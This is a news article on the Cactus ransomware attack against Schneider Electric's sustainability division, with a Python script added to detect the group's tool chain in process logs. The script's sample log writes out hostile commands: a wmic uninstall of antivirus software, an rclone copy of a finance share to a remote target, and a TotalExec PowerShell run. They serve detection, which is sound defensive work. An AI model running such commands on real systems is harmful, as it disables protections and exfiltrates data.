Schneider Electric, the French industrial giant, has just suffered a major cyberattack. The Cactus ransomware, already well known in cybercrime circles, targeted this company renowned for its innovative energy solutions. The incident raises many questions about data security in large companies.
Schneider Electric: a leader in the energy industry
Before delving into the heart of this cyberattack, it’s essential to understand Schneider Electric’s role in the industrial sector. With over 150,000 employees worldwide, this French company specializes in the supply of electrical equipment and renewable energy solutions. Its worldwide reputation makes it a key player in its field.
The January 17, 2024 attack: a major blow for Schneider Electric
January 17, 2024 was a dark day for Schneider Electric. Its sustainable development branch was the target of a cyberattack that paralyzed the “Resource Advisor” cloud platform. This service, essential for advising companies on renewable energies, remained inaccessible for several days, causing major inconvenience for users.

Confirmation and wider impact of the attack
Officially confirmed by Schneider Electric on January 29, the ransomware attack specifically targeted the Sustainability Business division, disrupting the “Resource Advisor” service as well as other systems specific to this division. Schneider Electric reacted quickly, mobilizing its response team to contain the incident and reinforce existing security measures. According to a company press release, “From an impact assessment point of view, the ongoing investigation shows that data has been accessed. As further information becomes available, Schneider Electric’s Sustainability Business Division will continue the dialogue directly with its affected customers and will continue to provide information and assistance where appropriate.” This statement underlines Schneider Electric’s commitment to open communication with its affected customers and to providing ongoing support.

Cybercriminals’ strategy: double extortion and data theft
The Cactus ransomware, first identified in March 2023, targeted Schneider Electric with a double extortion strategy: it rendered the platform unusable and stole terabytes of data. Beyond this tactic, Cactus demonstrated sophisticated access and attack techniques. According to BleepingComputer, which first reported the attack, Cactus uses legitimate tools such as Splashtop, AnyDesk and SuperOps RMM for remote access, and Cobalt Strike and Chisel for post-exploitation activities. Once access has been gained, Cactus deploys a batch script to uninstall popular antivirus solutions, increasing its ability to operate undetected. For data exfiltration Cactus uses the Rclone tool, and it automates the encryption process with a PowerShell script called TotalExec, previously used by operators of the BlackBasta ransomware. Cactus is also known to exploit vulnerabilities in VPNs from Fortinet, a service provider used by Schneider Electric, demonstrating the technical sophistication of these cybercriminals.
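The tool chain described above (commercial remote-access utilities, Cobalt Strike and Chisel, a batch script that removes antivirus products, Rclone for exfiltration and the TotalExec PowerShell script) is exactly the kind of sequence a defender can triage from process-creation telemetry. The script below is an added example written for this article; it is not code from the article, from Schneider Electric, or from any security vendor. It assumes a constructed key=value event format (`ts`, `host`, `user`, `image`, `cmdline`) and matches on executable or script names only, which is an assumption made for illustration: the security-product keyword list, host names, users and paths in the sample events are all invented.

```python
"""Triage process-creation events for the tool chain the article attributes
to Cactus: remote-access utilities (Splashtop, AnyDesk, SuperOps), post-
exploitation tooling (Cobalt Strike, Chisel), Rclone exfiltration, the
TotalExec PowerShell script and batch-driven antivirus removal.

Added example, not Schneider Electric's or any vendor's detection content.
The key=value log format and the sample events are constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Tool families named in the article, keyed by the tactic they serve.
# Matching on executable or script name is an assumption made for the example;
# a production rule would also check signer, hash and install path, because
# the same RMM tools are used legitimately by IT staff.
TOOL_SIGNATURES: Dict[str, tuple] = {
    "remote-access": ("splashtop", "anydesk", "superops"),
    "post-exploitation": ("cobaltstrike", "beacon", "chisel"),
    "exfiltration": ("rclone",),
    "encryption-staging": ("totalexec",),
}

# Heuristic for the batch script that uninstalls antivirus products:
# an uninstall verb and a security-product keyword in the same command line.
# The product keyword list is illustrative, not exhaustive.
UNINSTALL_VERB = re.compile(
    r"wmic\s+product\b.*\bcall\s+uninstall\b|msiexec(?:\.exe)?\s+/x\b|\buninstall\b",
    re.IGNORECASE,
)
SECURITY_PRODUCT = re.compile(
    r"antivirus|endpoint|defender|sophos|mcafee|symantec|kaspersky|eset",
    re.IGNORECASE,
)

# key=value pairs; quoted values may contain spaces and backslashes.
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')


@dataclass
class Finding:
    line_no: int
    host: str
    category: str
    evidence: str


def parse_event(line: str) -> Dict[str, str]:
    """Split one event line into a dict of fields, dropping surrounding quotes."""
    return {k: v.strip('"') for k, v in FIELD.findall(line)}


def looks_like_av_removal(cmdline: str) -> bool:
    """True when an uninstall verb and a security-product name appear together."""
    return bool(UNINSTALL_VERB.search(cmdline) and SECURITY_PRODUCT.search(cmdline))


def classify(image: str, cmdline: str) -> Optional[str]:
    """Return the tactic a process most plausibly serves, or None if nothing matches."""
    if looks_like_av_removal(cmdline):
        return "defense-evasion"
    # Collapse whitespace so "cobalt strike" and "cobaltstrike" both match.
    haystack = f"{image} {cmdline}".lower().replace(" ", "")
    for category, names in TOOL_SIGNATURES.items():
        if any(name in haystack for name in names):
            return category
    return None


def scan_log(lines: List[str]) -> List[Finding]:
    """Walk the event lines in order and return one Finding per suspicious process."""
    findings: List[Finding] = []
    for n, line in enumerate(lines, start=1):
        ev = parse_event(line)
        image, cmdline = ev.get("image", ""), ev.get("cmdline", "")
        category = classify(image, cmdline)
        if category is not None:
            findings.append(Finding(n, ev.get("host", "?"), category, cmdline or image))
    return findings


# Constructed sample telemetry: one benign event followed by events mirroring
# the stages the article describes. Hosts, users and paths are invented.
SAMPLE_LOG = r'''
ts=2024-01-17T01:02:03Z host=ws-12 user=alice image="C:\Program Files\Microsoft Office\winword.exe" cmdline="winword.exe Q4-report.docx"
ts=2024-01-17T01:10:44Z host=ws-12 user=alice image="C:\Users\alice\Downloads\AnyDesk.exe" cmdline="AnyDesk.exe --silent"
ts=2024-01-17T01:25:09Z host=srv-03 user=SYSTEM image="C:\Windows\System32\cmd.exe" cmdline="cmd.exe /c wmic product where name like '%Antivirus%' call uninstall /nointeractive"
ts=2024-01-17T02:31:55Z host=srv-03 user=SYSTEM image="C:\Temp\rclone.exe" cmdline="rclone copy D:\Shares\finance remote:bucket --transfers 32"
ts=2024-01-17T02:40:12Z host=srv-03 user=SYSTEM image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmdline="powershell.exe -File C:\Temp\TotalExec.ps1"
'''.strip().splitlines()


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no} host={f.host} [{f.category}] {f.evidence}")
```

Run stand-alone, the script flags the AnyDesk launch, the antivirus uninstall, the Rclone copy and the TotalExec invocation while leaving the Word document alone. The value of ordering findings by time on one host is the point: any single match (an RMM tool, a `msiexec /x`) is noise in most estates, but remote access followed within an hour by security-product removal and a bulk copy to a remote target on the same server is the double-extortion pattern the article describes, and a SIEM correlation rule should key on that sequence rather than on the individual tool names.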
Security issues: customer data potentially compromised
Beyond these concerns, the nature of the data stolen in the Cactus attack could be particularly sensitive. Schneider Electric’s Sustainability Business division, targeted by the attack, offers consulting services to companies on renewable energy solutions and compliance with climate regulations. As a result, the compromised data could include detailed information on customers’ energy usage, industrial control and automation systems, and data on compliance with environmental and energy regulations. This possibility raises heightened concerns about the attack’s potential impact on Schneider Electric’s customers and on the security of critical information in the energy sector. Schneider Electric’s sustainability customers include several large companies such as Walmart, Lexmark, DHL and PepsiCo.
Other Cactus victims: a wider context
In addition to Schneider Electric, Cactus has targeted several other French companies, adding to its list of victims. These include Odalys Vacances in the tourist accommodation sector, Promotrans, specialized in professional training, and Agoravita, a digital services company. This diversity of targets illustrates the versatile threat posed by Cactus in the cybercrime landscape. The group’s approach, combining the purchase of credentials, partnerships with malware distributors, phishing attacks and the exploitation of vulnerabilities, demonstrates the sophistication and adaptability of its attack methods. Cactus’ ability to target companies in such a wide range of fields underlines the importance for all industries of strengthening their cybersecurity measures in the face of such versatile and unpredictable adversaries.
The Cactus gang: a growing threat in the world of ransomware
The Cactus gang, active since March 2023, has rapidly established itself as a serious threat in the world of cybercrime. With a growing number of corporate victims, including Schneider Electric, Cactus is demonstrating a notable ability to target and compromise large-scale organizations. For an in-depth analysis of their methods and impact, we invite you to read our detailed article on the Cactus gang.
Schneider Electric and cybersecurity: an ongoing battle
This isn’t the first time Schneider Electric has fallen victim to a cyberattack. Recently, the Clop ransomware gang exploited a security flaw in MOVEit Transfer, another of the company’s services, resulting in data theft. These repeated incidents highlight the ongoing cybersecurity challenges facing large enterprises.
Restoration plan and security measures
In response to the attack, Schneider Electric quickly put in place a recovery plan, aiming to restore access to the affected systems within two working days. This exemplary responsiveness testifies to the company’s commitment to minimizing the impact on its operations and customers. This incident highlights the need for companies of all sizes to continually reinforce their security measures in an increasingly connected world.
The importance of a rapid and effective response
This latest cyberattack underlines the importance of effective crisis management in the face of the growing threat of ransomware. The ability to react quickly, implement restoration measures and communicate effectively with stakeholders is essential to reduce damage and speed up the resumption of normal activities.